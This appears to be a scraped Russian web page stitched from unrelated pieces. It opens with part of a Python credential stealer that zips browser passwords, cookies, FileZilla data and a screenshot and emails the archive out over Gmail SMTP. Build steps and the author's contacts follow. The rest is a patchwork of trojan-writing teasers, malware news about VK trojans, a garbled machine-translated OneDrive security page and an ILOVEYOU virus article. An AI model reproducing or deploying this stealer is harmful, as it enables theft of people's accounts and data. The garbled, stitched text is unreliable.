file = open(os.getenv("APPDATA") + '\\filezilla.txt', "w+")
file.write(str(filezilla()) + '\n')
file.close()
################################################################################
# SCREEN #
################################################################################
screen = ImageGrab.
grab()
screen.save(os.getenv("APPDATA") + '\\sreenshot.jpg')
################################################################################
# PACKING TO ZIP #
################################################################################
zname = r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
NZ = zipfile.ZipFile(zname,'w')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\firefox_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\yandex_passwords.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\alldata.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\google_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium.
txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\chromium_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\amigo_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_pass.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\opera_cookies.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\filezilla.txt')
NZ.write(r'C:\\Users\\' + getpass.getuser() + '\\AppData\\Roaming\\sreenshot.jpg')
NZ.close()
################################################################################
# DOC-НАШ ZIP #
################################################################################
doc = 'C:\\Users\\' + getpass.getuser() + '\\AppData\\Local\\Temp\\LOG.zip'
################################################################################
# ОТПРАВКА #
################################################################################
'↑Stealler by Andrew_Shipunov↑'.
encode('utf-8')
msgtext = MIMEText('↑Stealler by Andrew_Shipunov↑'.encode('utf-8'), 'plain', 'utf-8')
msg = MIMEMultipart()
msg['From'] = 'ваша новая почта@gmail.com'
msg['To'] = 'почта куда отправится'
msg['Subject'] = getpass.getuser() + '-PC'
msg.attach(msgtext)
################################################################################
# СОЗДАНИЕ ВЛОЖЕНИЯ #
################################################################################
part = MIMEBase('application', "zip")
b = open(doc, "rb").read()
bs = encodebytes(b).decode()
part.set_payload(bs)
part.add_header('Content-Transfer-Encoding', 'base64')
part.add_header('Content-Disposition', 'attachment; filename="LOG.zip"')
msg.attach(part)
################################################################################
# ОТПРАВКА вам #
################################################################################
s = smtplib.SMTP('smtp.
gmail.com', 587)
s.starttls()
s.login('новая ваша почта гмаил', 'пароль от новой почты гмаил')
s.sendmail('новая ваша почта гмаил', 'почта куда отправится', msg.as_string())
s.quit()
i = input()
Вот что пришло.
Вот что в архиве.
В тхт Alldata.
Сборка.
Открываете cmd консоль и пишете cd и путь к папке где лежит ваш файл с кодом, ентер.
cd и путь к файлу.
Теперь pyinstaller —onefile название вашего файла.py, ентер.
Ссылки
m228228 — Пишите мне в вк если что-то не работает, у самого постоянно ошибки лезутXD.
@AndrewJess — или тут спрашивайте.
Написание трояна для кражи пароля вк. Пользователей «ВКонтакте» атакует опасный троян Как взломать страницу ВК
Трояны в последнее время очень актуальны, так как используются повсеместно:). А главное очень эффективны и просто не заменимы в натягивании ламерюг:).
Но обычно все используют уже готовые, непонятно как сделанные и кривые трояны, которые выкачиваются где-то в инете… Но при желании можно написать троян и самому, как именно — читай дальше.
Надоело тянуть файлы с помощью MAPI с удаленного компьютера? Придется писать троян, но уже управляемый по протоколу TCP/IP.
Кража денег с помощью смартфона: банковские трояны для беспечных пользователей
Кража денег с банковских счетов становится все более распространенным делом – в социальных сетях и на форумах постоянно всплывают новые истории от людей, внезапно обнаруживших свой банковский счет пустым.
И если раньше основным инструментом воровства выступала платежная карта, с которой где-то «срисовали» данные и ПИН, то сейчас вполне можно обойтись и без физического контакта с ней – достаточно доступа к смартфону или ПК, работающим с банковскими приложениями.
Пишем свой троян с нуля
Всем привет)))соглашусь, что изобретаю велосипед, но хочется сделать все своими ручками не прибегая к open source и т.п. для повышения своего опыта в программировании на Visual C++. Хочу, чтобы меня поставили на иснниный путь.
Итак, цель — написание трояна, а именно кейлоггера) для получения пароля от vk. com. Погуглил. почитал мануалы парочку часов, узнал основные схемы проникновения троянов на комп.
Написание трояна для кражи пароля вк
135 тысяч паролей от аккаунтов сети «Вконтакте» оказались в Интернете в открытом доступе. Как такое могло случиться с одной из самых популярных в Рунете социальных сетей — это одна из самых обсуждаемых тем в кириллическом сегменте Всемирной паутины. Приложение «Подводный мир 2» , заблокированное на данный момент администрацией «В контакте», подсадило вирус и украло пароли более чем у 130 тысяч пользователей.
Как взломать страницу ВК?
Сервис ВКонтакте пользуется высочайшей популярностью среди сотен миллионов пользователей по всему миру. На vk.com каждому человеку предоставляются огромные возможности: виртуальное общение, знакомства, просмотр фотографий и видеозаписей других людей, выкладывание своего фото и видео контента.
многочисленные онлайн-игры и приложения на самую разнообразную тематику и многое другое.
Троян USB Thief использует USB-носители для кражи личных данных пользователей
Компания ESET сообщила об обнаружении новой троянской программы под названием USB Thief. Примечательна она тем, что использует для распространения съёмные USB-носители — внешние жёсткие диски или флешки.
Троянец запускается исключительно со съёмного USB-устройства и не оставляет никаких следов в системе, а пользователь не замечает, что данные перемещаются с компьютера на внешний накопитель.
7 признаков того, что вас хакнули
Когда-то вирусы писались для развлечения, для демонстрации знаний своего автора. Теперь же они всё чаще служат сугубо практическим зловредным целям: кража паролей, рассылка спама, создание ботнетов и так далее. Такая зараза может годами сидеть в вашей системе и почти ничем не выдавать своего присутствия.
Поэтому очень важно знать основные признаки заражения.
Если вы получаете письма с сообщением о том, что ваш пароль к какому-либо сервису был изменен, в то время как вы не делали ничего подобного, то это однозначный признак попытки или удачного взлома.
Почему хакеры так легко и просто взламывают наши пароли?
Взлом пользовательских паролей — одно из самых распространённых преступлений в Сети, оставляющее далеко позади DoS-атаки и создание бот-сетей. Почему же хакерам так легко удаётся вскрывать пароли?
А всё дело в пресловутом человеческом факторе. Самая главная причина — мы подсознательно выбираем такие пароли, которые очень сложно угадать и запомнить посторонним людям, но с которыми «на раз» справляется обычный персональный компьютер.
Эта музыка будет вечной
Около года назад мы писали про троянское приложение «Музыка ВКонтакте». На первый взгляд это музыкальный плеер для воспроизведения музыки из «ВКонтакте» на Android-устройствах, созданный сторонними разработчиками.
Однако у этого плеера обнаружилась дополнительная функциональность — оказалось, что приложение воровало пароли пользователей, установивших «Музыку» на свои смартфоны и планшеты.
ESET обнаружила троян, ворующий пароли от банковских приложений
Регистрация пользователя в сервисе РИА Клуб на сайте Ria.Ru и авторизация на других сайтах медиагруппы МИА «Россия сегодня» при помощи аккаунта или аккаунтов пользователя в социальных сетях обозначает согласие с данными правилами. На сайтах медиагруппы МИА «Россия сегодня» может осуществляться редактирование комментариев, в том числе и предварительное.
08.05.2017 15:10
Специалистам компании «Доктор Веб» удалось обнаружить новую вредоносную активность, которая несет угрозу пользователям одной из самых популярных социальных сетей в России — «ВКонтакте». Вредоносная программа называется Trojan.MulDrop7.26387 или сокращенно MulDrop7.
Случаи заражения этим вирусом проявились вполне безобидным на первый взгляд образом. В официальной группе «Доктора Веба» в социальной сети часто начал появляться спам. Модераторы ранее успешно справлялись с такими записями, но чем чаще они стали появляться, тем больше времени требуется на его удаление. Модерторам не всегда удавалось вовремя справляться, из-за чего такой спам задерживался на странице.
Спамерские записи появлялись в качестве комментариев на страницах под разными записями. В них распространители предлагали пользователям скачать якобы лицензионные ключи для антивирусной программы Dr. Web, которые доступны совершенно бесплатно. Те пользователи, которые поведутся на такого рода сообщения и захотят воспользоваться предложенными ключами, подвергнут свой компьютер очень серьезной опасности.
Чаще всего в спам-комментариях присутствует короткая ссылка, по которой пользователю должны предоставляться те самые ключи, но вместо них на компьютер загружается вредоносная программа. Предложенная в комментариях ссылка ведет на хостинг Rghost. Как только человек кликает по ней, ему сразу же показывается предложение осуществить загрузку RAR-архива, который весит всего 26 Кбайт. Естественно, в нем нет никаких ключей для антивирусной программы, а таким способом злоумышленники вынуждают пользователей самостоятельно загрузить на свой персональный компьютер вредоносное ПО.
При попытке открыть архив, пользователь обнаружит, что в нем находится иконка обычного текстового документа. Исследователям компании удалось обнаружить несколько образцов вредоносного кода, но все они оказались абсолютно одинаковыми. Для того чтобы спрятать малварь от антивирусного ПО, хакеры каждый раз переупаковывают ее. Благодаря этому вирус может довольно долгое время распространяться и находиться на компьютере абсолютно незамеченным. Обнаружение происходит только после очередного обновления вирусных баз и попадания в них новой угрозы.
После подробного изучения зловреда специалисты «Доктора Веба» пришли к выводу, что функции, исполняемые MulDrop7, в большинстве своем очень забавные. Хотя некоторые из них могут нанести очень серьезный вред. Например, после проникновения на компьютер своей жертвы вирус налаживает связь со своим управляющим сервером и передает на него всю доступную информацию о ПК, включая наличие подключенной веб-камеры.
С помощью трояна злоумышленник может выполнять функции вроде демонстрации на экране сообщений с подготовленным заранее текстом, перезагружать ПК, произносить с помощью синтезатора речи необходимые фразы, скрывать панель задач операционной системы Windows, открывать в веб-обозревателе любую страницу, в том числе и содержащую другой вредоносный код, редактировать системный реестр, делать без ведома пользователя и передавать на системный реестр скриншоты экрана, скачивать и запускать исполняемые файлы, обновлять файл троянской программы и пр. Среди исполняемых функций есть и несколько забавных, которые не могут причинить особого вреда. К таким относится возможность задать кнопкам мыши противоположные функции, открыть и закрыть привод для оптических дисков, отключить или включить в любой момент монитор, изменить обои Рабочего стола и пр.
К самым опасным функциям этого троянца можно отнести кейлоггер. Это значит, что MulDrop7 следит за тем, какие кнопки пользователь нажимает при введении паролей, и отправляет эту информацию на удаленный сервер. Таким образом, хакеры смогут получить пароли от всех учетных записей пользователя.
В троян интегрирована еще одна функция, которая используется скорее для развлечения, чем для причинения вреда. MulDrop7 позволяет в любой момент показывать на экране ужасающие ролики.
По мнению экспертов, подобный функционал добавляют в свои вирусные программы начинающие хакеры, которые делают это ради забавы.
Российский разработчик средств защиты от вредоносных программ и хакерских атак, сообщает о том, что в текущий момент характер заражения пользователей социальных сетей троянской программой Trojan. RpcTonzil принимает характер эпидемии.
Так, по оценке вирусной лаборатории Cezurity, сегодня этой вредоносной программой заражено не менее 50,000 участников ВКонтакте. К такому выводу привел анализ данных, получаемых с помощью Cezurity Cloud — облачной технологии антивирусной защиты нового поколения, которая способна обнаруживать подобные угрозы с помощью выявления аномалий в файлах. Большинство антивирусных продуктов способны обнаружить лишь некоторые модификации Trojan.RpcTonzil. Заражению могут быть подвержены компьютеры под управлением операционных систем Microsoft Windows, причем как 32-битных, так и 64-битных.
В результате заражения злоумышленники получают целый ряд возможностей — от получения доступа к аккаунтам в социальной сети и последующей рассылки спама с взломанных страниц до похищения персональных данных пользователей и СМС-мошенничества.
Троянская программа Trojan.RpcTonzil модифицирует запросы компьютеров к DNS-серверу. В результате при попытке зайти в социальную сеть пользователь оказывается на специально созданной злоумышленниками фишинговой web-странице, которая имитирует и практически неотличима от страницы ВКонтакте, где сообщается о том, что аккаунт социальной сети был взломан. Злоумышленники предлагают создать новый пароль и верифицировать привязку своего номера мобильного телефона к аккаунту в социальной сети. Пользователей может обмануть адрес, который отображается в адресной строке браузера — он полностью соответствует правильному и возникает ощущение, что страница действительно принадлежит ВКонтакте.
Троян также блокирует доступ к сайтам большинства антивирусных компаний и серверам обновления Microsoft. Таким образом, у антивирусных лабораторий зачастую нет достаточного количества данных для того, чтобы заметить распространение заражения. Отдельные варианты Trojan.RpcTonzil были обнаружены и детектировались антивирусными компаниями уже с начала марта этого года. Однако, на сегодняшний день распространение Trojan.RpcTonzil продолжается и большинством антивирусов вредоносная программа либо вообще не обнаруживается, либо детектируются лишь некоторые модификации.
Трудность обнаружения всех модификаций Trojan.RpcTonzil связана с тем, что в троянской программе используется достаточно сложная техника сокрытия от антивирусов. При этом на компьютеры жертв троянская программа может попадать различными способами. В некоторых случаях заражение может быть предотвращено встроенными в антивирусы поведенческими механизмами защиты.
«После заражения компьютера троянская программа существует только в зашифрованном виде. Ее расшифровка и автозапуск осуществляется с помощью небольшой модификации системной библиотеки rpcss.dll, — говорит Кирилл Пресняков, ведущий вирусный аналитик Cezurity, — троян использует технику заражения, похожую на метод EPO (Entry Point Obfuscation, скрытая точка входа). Большинство антивирусов не способно детектировать заражение, произведенное таким образом, то есть, не зная вируса «в лицо» — они могут обнаружить этот троян только по поведению. Осложняет детектирование и тот факт, что внедренный в системную библиотеку фрагмент носит условно-случайный характер».
Другим возможным препятствием для обнаружения и лечения вредоносной программы может быть географическая направленность атаки — заражение причиняет вред только пользователям российских социальных сетей.
«Эта троянская программа любопытна не как образец техники заражения — антивирусная индустрия давно знакома с похожими методами — говорит Алексей Чалей, генеральный директор Cezurity, — скорее история распространения трояна хорошо иллюстрирует сложившуюся в антивирусной индустрии ситуацию. Так, вредоносная программа известна уже три месяца, продолжает распространяться, однако, большинством антивирусных продуктов либо вообще не обнаруживается, либо они не способны корректно вылечить компьютер после заражения”.
Как OneDrive защищает ваши данные в облаке
Вы управляете своими данными. При помещении данных OneDriveоблачномхранилище вы остается владельцем данных. Дополнительные сведения о владениях данными см. в Office 365 Конфиденциальность по дизайну.
В этом учебном курсе вы узнаете о OneDrive, которые можно использовать для защиты файлов, фотографий и данных: Защита, защита и восстановление OneDrive
Как можно защитить данные
Вот несколько вещей, которые можно сделать для защиты файлов в OneDrive:
-
Создайте надежный пароль.
Проверьте силу пароля.
-
Добавьте информацию о безопасности в свою учетную запись Microsoft. Вы можете добавить информацию, такую как номер телефона, альтернативный адрес электронной почты, а также секретный вопрос и ответ. Если вы вдруг забудете свой пароль или вашу учетную запись взломают, мы сможем использовать эти сведения для проверки вашей личности и поможем вам вернуть свою учетную запись и все, что с ней связано. Перейдите на страницу Сведения о безопасности.
-
Используйте двухфакторную проверку. Безопасность вашей учетной записи повысится благодаря дополнительному коду безопасности, который вам потребуется вводить каждый раз, когда вы будете выполнять вход не с доверенного устройства. Второй фактор может быть сделан через телефонный звонок, текстовое сообщение или приложение. Дополнительные сведения о двухэтапной проверке см. в разделе Как использовать двухэтапную проверку с вашей учетной записью Microsoft.
-
Включить шифрование на мобильных устройствах. Если у вас есть мобильное OneDrive, мы рекомендуем включить шифрование на устройствах с iOS или Android. Это помогает защитить ваши OneDrive в случае потери, кражи или получения доступа к ним.
-
Подпишитесь на Microsoft 365. Подписка Microsoft 365 обеспечивает расширенные возможности защиты от вирусов и киберпреступности, а также способы восстановления файлов после атак.
Защита OneDrive данных
Инженеры Майкрософт администрировать OneDrive с помощью консоли Windows PowerShell, которая требует двух факторной проверки подлинности. Мы выполняем задачи каждый день, запуская рабочий процесс, чтобы быстро реагировать на новые ситуации. Ни один инженер не имеет постоянного доступа к службе. Когда инженерам требуется доступ, они должны запросить его. Возможность участия в проекте проверяется, и если доступ инженера утвержден, это возможно только в течение ограниченного времени.
Кроме того, OneDrive и Office 365, полностью вкладывает средства в системы, процессы и персонал, чтобы снизить вероятность нарушения личных данных, а также быстро обнаружить и устранить последствия нарушения. К числу наших инвестиций в этом пространстве относятся:
Системы управления Access:OneDrive и Office 365 поддерживают политику «нулевого доступа», то есть инженеры не имеют доступа к службе, если она не предоставлена явным образом в ответ на определенный инцидент, который требует повышения уровня доступа. При предоставлении доступа это делается в соответствии с принципом наименьших привилегий: разрешение, предоставленное для определенного запроса, позволяет использовать для его обслуживания лишь минимальный набор действий. Для этого OneDrive и Office 365 строго разделять роли повышения, при этом каждая роль разрешает только определенные предопределяющие действия. Роль «Доступ к данным клиента» отличается от других ролей, которые чаще всего используются для администрирования службы и тщательно анализируются до утверждения. В совокупности эти вложения в управление доступом значительно снижает вероятность того, что инженеры OneDrive или Office 365 ненадлежащим образом получать доступ к данным клиентов.
Системы мониторинга безопасности и автоматизация. OneDrive и Office 365 поддерживают надежные системы мониторинга безопасности в режиме реального времени. Кроме прочего, эти системы оповещают о попытках неоправданно получать доступ к данным клиентов или о попытках передачи данных из службы. В связи с упомянутыми выше вопросами управления доступом наши системы мониторинга безопасности фиксировали подробные запросы на повышение и действия по заданным запросам на повышение. OneDrive и Office 365 также поддерживать средства автоматического решения, которые автоматически устраняют угрозы в ответ на обнаруженные проблемы, и выделенные группы для реагирования на оповещения, которые невозможно решить автоматически. Чтобы проверить наши системы мониторинга безопасности, OneDrive и Office 365 регулярно проводит упражнения с красными командами, в ходе которых внутренняя группа тестирования перед проверкой передавлила злоумышленникам имитацию поведения злоумышленников в живой среде. Эти мероприятия регулярно усовершенствовают возможности мониторинга безопасности и реагирования на них.
Персонал и процессы. В дополнение к описанным выше автоматизациям OneDrive и Office 365 поддерживают процессы и группы, отвечающие за процессы обеспечения конфиденциальности и управления инцидентами в разных организациях. Например, подробные сведения о нарушении конфиденциальности. Стандартная операционная процедура (SOP) сохраняется и совместно работает с командами в организации. В этом проекте подробно описаны роли и обязанности как отдельных групп в OneDrive, так и Office 365 групп реагирования на инциденты безопасности. Они охватывают как то, что необходимо сделать группам для повышения безопасности компании (проведение проверки безопасности, интеграция с системами централизованного мониторинга безопасности и другие методики), так и действия групп в случае фактического нарушения безопасности (быстрого реагирования на инциденты, обслуживания и предоставления определенных источников данных, которые будут использоваться для ускорения процесса реагирования). Teams также регулярно обучаются классификации данных и правильной обработке и хранению личных данных.
Основные изменения в том, OneDrive и Office 365 для потребительских и бизнес-планов, полностью снизив вероятность и последствия нарушения личных данных, которые влияют на наших клиентов. В случае нарушения личных данных мы стремимся быстро уведомить наших клиентов о нарушении после его подтверждения.
Защищен во время общественного транспорта и в пути
Защищен во время общественного транспорта
При переносе данных в службу из клиентов и между центрами обработки данных они защищаются с помощью шифрования TLS. Мы разрешаем только безопасный доступ. Мы не разрешаем подключения для проверки подлинности через HTTP, а перенаправляем их на HTTPS.
Защищенная неавтет
Физическая защита.Доступ к центрам обработки данных может получить лишь ограниченное количество сотрудников. Удостоверения проверяются с учетом нескольких факторов проверки подлинности, включая смарт-карты и биометрические данные. Есть сотрудники, которые работают на локальной службе безопасности, являются сотрудниками службы контроля за движением и видеосвязи. Оповещения об обнаружении назойки отслеживают аномальные действия.
Защита сети.Сети и удостоверения изолированы от корпоративной сети Майкрософт. Брандмауэры ограничивают трафик в среду из несанкционированных мест.
Безопасность приложений.Инженеры, которые могут создавать функции, отслеживают жизненный цикл разработки системы безопасности. Автоматическое и ручное анализы помогают выявить возможные уязвимости. Центр безопасности Майкрософт помогает оценить входящие отчеты об уязвимостях и оценить степень их снижения. С помощью условий microsoft Cloud Bug Terms, люди по всему миру могут заработать деньги, сообщая об уязвимостях.
Защита содержимого:каждый файл шифруется неавтетно с помощью уникального ключа AES256. Эти уникальные ключи шифруются с помощью набора главных ключей, которые хранятся в хранилище ключей Azure.
Высокая доступно, всегда доступно для восстановления
Наши центра обработки данных распределены по региону и являются сбойными. Данные зеркально отражаются по крайней мере в двух разных областях Azure, которые находятся по крайней мере в 100 километрах друг от друга, что позволяет нам минимизировать последствия естественных катаклизмов или потерь в регионе.
Непрерывно проверяемая
Мы постоянно следим за центрами обработки данных, чтобы они были надежными и безопасными. Начинается с инвентаризации. Агент по инвентаризации выполняет фиксировать состояние каждого компьютера.
После инвентаризации мы можем отслеживать и устранять проблемы с работой компьютеров. Непрерывное развертывание гарантирует, что каждый компьютер получит исправления, обновленные антивирусные подписи и сохраненную конфигурацию. Логика развертывания обеспечивает исправление или поворот только определенного процента компьютеров за раз.
Команда Microsoft 365 «Red Team» в корпорации Майкрософт состоит из специалистов по назойлации. Они будут искать любые возможности для получения несанкционированного доступа. «Синяя команда» состоит из разработчиков, которые уделяют особое внимание защите, обнаружению и восстановлению. Они внедряют технологии обнаружения и реагирования на них. Чтобы быть в ногу с обучением групп безопасности в корпорации Майкрософт, см. Office 365 (блог).
Дополнительные OneDrive безопасности
Служба облачного хранилищаOneDrive множество других функций безопасности. К ним относятся:
-
Сканирование вирусов при скачии на известные угрозы: антивирусная программа Защитник Windows проверяет документы во время скачивания на содержимое, совпадающие с av-подписью (обновляется почасово).
-
Мониторинг подозрительных действий. Чтобы предотвратить несанкционированный доступ к вашей учетной записи, вы OneDrive отслеживать и блокирует подозрительные попытки войти. Кроме того, мы отправим вам уведомление по электронной почте при обнаружении необычных действий, например попыток войти с нового устройства или из другого расположения.
-
Обнаружение и восстановление программ-выможтелей. Подписчики программы- Microsoft 365 получат оповещение, если OneDrive обнаружит программ-вымогателей или вредоносную атаки. Вы сможете легко восстановить файлы за один момент до того, как они были затронуты ( в течение 30 дней после атаки). Вы также можете восстановить весь файл OneDrive в течение 30 дней после вредоносной атаки или потери данных других типов, например повреждения файла или случайного удаления и редактирования.
-
История версий для всех типов файлов. При нежелательных изменениях или случайных удалениях вы можете восстановить удаленные файлы из корзины OneDrive или предыдущую версию файла в OneDrive.
-
Защищенные паролем & ссылки для общего доступа с истекающим сроком действия. Подписчики Microsoft 365 могут обеспечить более безопасную защиту общих файлов, требуя пароля для доступа к ним или устанавливая дату окончания срока действия по ссылке для общего доступа.
-
Уведомление о массовом удалении файлов и их восстановление. Если вы случайно или намеренно удалили большое количество файлов в облачной резервной копии мы уведомим вас и предоправим вам действия по восстановлению этих файлов.
Личный сейф
OneDrive личный сейф — это защищенная область в OneDrive, к которую можно получить доступ только с помощью мощного метода проверки подлинности или второго шага проверки личности, например отпечатка пальца, лица, ПИН-кода или кода, отправленного вам по электронной почте или SMS.1 Заблокированные файлы в личном сейфе имеют дополнительный уровень безопасности, что обеспечивает их дополнительную безопасность на случай, если кто-то получит доступ к вашей учетной записи или вашему устройству. Личное хранилище доступно на компьютере, OneDrive.com и мобильном приложении OneDrive, а также включает следующие функции:
-
Сканирование непосредственно в личный сейф. С помощью мобильного приложения OneDrive можно делать снимки и снимать видео непосредственно в личном сейфе, не сохраняя их в менее безопасных местах устройства, например в вашем фотоальбоме.2 Вы также можете проверять важные документы о поездках, идентификации, автомобиле, дома и страховке непосредственно в личном сейфе. У вас будет доступ к этим фотографиям и документам, где бы вы ни были, на разных устройствах.
-
BitLocker шифрования. Windows 10 компьютеров OneDrive синхронизирует файлы личного сейфа с BitLocker, зашифрованной на локальном жестком диске.
-
Автоматическая блокировка. Личный сейф автоматически блокируется на компьютере, устройстве или в Сети после короткого периода бездействия. После блокировки все файлы, которые вы использовали, также будут заблокированы и требуют повторной проверки подлинности для доступа.3
Эти меры помогают защитить заблокированные файлы личного сейфа даже в том случае, если ваш компьютер Windows 10 или мобильное устройство будет утерян, украден или кто-то получит к нему доступ.
1 Для проверки лиц и отпечатков пальцев требуется специальное оборудование, в том числе устройство с Windows Привет, сканер отпечатков пальцев, подключенный датчик IR или другие биометрические датчики и устройства с возможностью проверки.
2 Для OneDrive для Android и iOS требуется Android 6.0 или выше или iOS 12.0 и более новые версии.
3 Интервал автоматической блокировки зависит от устройства и может быть установлен пользователем.
Дополнительные сведения
Вирус «Love» включает троянский конь
, крадущий пароли.Вирус электронной почты «I Love You», который вынудил в четверг выключить почтовые серверы по всему миру, содержит троянскую программу, которая отправляет кэшированные пароли Windows ничего не подозревающим получателям, открывшим загруженное вирусом вложение в учетная запись электронной почты на Филиппинах.
Эксперты по безопасности заявили, что программа «Троянский конь» также может похищать пароли для доступа к Интернет-службам по коммутируемому доступу с компьютеров конечных пользователей.Эксперты предупреждают, что зараженные пользователи должны позаботиться о смене паролей, которые могли быть скомпрометированы.
Элиас Леви, аналитик по безопасности в SecurityFocus.com в Сан-Матео, Калифорния, сказал, что вирус Лава модифицировал стартовые страницы Internet Explorer, чтобы указывать на один из четырех веб-сайтов, размещенных филиппинским провайдером интернет-услуг Sky Internet Inc.
Вирус, который содержится во вложении сценария Visual Basic под названием «LOVE-LETTER-FOR-YOU.TXT.vbs», настраивал скомпрометированные компьютеры для распознавания филиппинских веб-сайтов как их домашней страницы IE по умолчанию, а затем для загрузки исполняемого файла с именем WIN- ИСПРАВЛЕНИЕ ОШИБКИ.EXE. Исполняемый файл, в свою очередь, откачивал пароли Windows и удаленного доступа и отправлял их на [email protected], филиппинский адрес электронной почты.
Представитель Microsoft Corp. подтвердил, что филиппинские веб-сайты воруют пароли, но сказал, что эти сайты были заблокированы. Компания настаивала на том, чтобы все загруженные пароли были зашифрованы и поэтому не представляли опасности для пользователей.
Но Леви утверждал, что компании, зараженные вредоносной программой до того, как веб-сайты были отключены, могли непреднамеренно отправить конфиденциальные и доступные пароли неизвестному злоумышленнику.«Любой, кто найдет исполняемый файл на своем компьютере, должен сменить пароли всех учетных записей, с которых вы используете свой компьютер», — сказал он.
«На самом деле это один из наиболее сложных вирусов, которые мы видели, потому что он соответствует категории вирусов, червей и кода троянского коня, который маскируется под что-то одно, а затем делает что-то еще в фоновом режиме», — сказала Таня Кандия, вице-президент глобального маркетинга в F-Secure Corp. F-Secure, поставщик программного обеспечения для обеспечения безопасности из Эспоо, Финляндия, утверждает, что обнаружила вирус.
Группа реагирования на компьютерные чрезвычайные ситуации (CERT) из Питтсбурга заявила, что получила сообщения о том, что по состоянию на 14:00 пострадали более 300000 компьютеров на 250 объектах. по восточному времени в четверг. В число организаций, пострадавших от вируса Любви, входили крупные компании, такие как Merrill Lynch & Co. и Dow Jones & Co., а также пользователи электронной почты в агентствах Министерства обороны, Сенате и Палате представителей США.
Масштабы заражения сравнивают с ущербом, нанесенным широко разрекламированным червем Melissa в прошлом году.Например, поставщик Network Associates Inc., Санта-Клара, Калифорния, который разрабатывает инструменты McAfee VirusScan, сообщил, что до 80% ее клиентов из списка Fortune 100 были затронуты вирусом Любви.
Вариант вируса под названием VeryFunny.vbs с темой «fwd: Joke» появился вчера позже и поразил такие компании, как International Data Corp. в Фремингеме, штат Массачусетс, и Zona Research Inc. в Редвуд-Сити, штат Калифорния.
Антивирусные компании, большинство из которых не предлагали защиты от вируса до тех пор, пока его сигнатура не была обнаружена, оказались захвачены встревоженными пользователями.Веб-серверы антивирусных компаний, таких как Computer Associates International Inc. и Symantec Corp., зависли, что не позволяло пользователям загружать исправления с сайтов.
Многим компаниям приходилось отключать свои почтовые серверы и отключаться от Интернета, чтобы избавиться от вирусов и зараженных файлов. «Мы стали свидетелями огромного сбоя в бизнесе», — сказала Кандия. «Вы должны верить, что все, что может вызвать такую нагрузку на корпоративную сеть, повлияет на все виды услуг.»
Криста Кароне, представитель Xerox Corp. в Рочестере, штат Нью-Йорк, сказала, что работники Xerox в США были предупреждены о вирусе европейскими коллегами в 5 часов утра по восточному времени в четверг утром. По ее словам, раннее предупреждение дало ИТ-менеджерам возможность изолировать вирус на уровне сервера до того, как он достигнет рабочих столов компании.
Но тысячи зараженных сообщений были обнаружены на сервере Microsoft Exchange компании, который нужно было отключить на два часа, чтобы удалить вирус до начала рабочего дня.Компания также закрыла свой внешний почтовый трафик до полудня.
По словам Кароне, к тому времени, когда началось обычное рабочее время, Xerox также развернула обновления своего антивирусного программного обеспечения McAfee и рассылала сообщения голосовой почты, листовки по электронной почте и уведомления в системе общего доступа компании, предупреждающие сотрудников о вирусе.
«Эти усилия помогли нам, и не было подтвержденных сообщений о повреждении системы (которые были) связаны с вирусом», — сказал Кароне. «Группа реагирования провела ужасный день и работала круглосуточно.Однако для (других) сотрудников Xerox это было незаметно «.
Компания Schebler Co., производитель листового металла из Беттендорфа, штат Айова, также пострадала. «Это меня пригвоздило. Это плохое», — сказал Марти Кокс, менеджер по информационным системам Schebler.
Кокс сказал, что его интернет-провайдер отключил свой почтовый сервер, чтобы избавиться от вируса. Между тем, он не мог получить доступ к веб-сайту производителя программного обеспечения Schebler, Made2Manage Systems в Индианаполисе, и Кокс сказал, что система электронной почты Made2Manage, похоже, также не работает.
«Это может действительно навредить нам, если это будет длиться долго», — сказал Кокс. «Мы полагаемся на электронную почту для пересылки чертежей (автоматизированного проектирования) между компаниями, и отправка этого с помощью обычной почты действительно замедлит нас».
Вирус, о котором было сообщено более чем в 20 странах, распространялся по электронной почте, через Интернет-чат и через общие файловые системы. Наличие файлов с именами MSKernal132.vbs и Win32DLL.vbs указывает на то, что система заражена.
В зараженных сообщениях электронной почты в строке темы написано «ILOVEYOU», а в теле сообщения обычно содержится просьба к получателям «любезно проверить прикрепленный LOVELETTER, исходящий от меня.«Прикрепленный файл, написанный на языке Visual Basic, скорее всего, будет называться« LOVE-LETTER-FOR-YOU.TXT.vbs ».
Вирус нацелен на программу электронной почты Microsoft Outlook, автоматически отправляя сообщения с вирусом всем в адресной книге зараженного пользователя. Microsoft заявила, что пользователи Outlook могут защитить себя, просто не открывая сообщения.
Но для пользователей, у которых есть и Outlook, и сопутствующий продукт под названием Windows Scripting Host, простого предварительного просмотра сообщения достаточно для активации вируса, сообщает CERT.«Совет избегать нажатия на нежелательную почту в этом случае не помогает, хотя помогает пользователям почтовых программ, отличных от Outlook», — говорится в заявлении CERT.
Огромные объемы исходящей почты, вызванные функцией самовоспроизводящегося червя, засоряли корпоративные сети по всему миру. По словам Леви, вирус также перезаписывает файлы, оканчивающиеся на js, jse, css, wsh, sct и hts, а затем переименовывает их так, чтобы они заканчивались на vbs.
По словам Леви, то же самое происходит с файлами изображений, заканчивающимися на jpg и jpeg.Он добавил, что вирус также находит файлы MP3 и создает файлы vbs с тем же именем, но в этом случае исходные файлы просто скрыты и могут быть восстановлены.
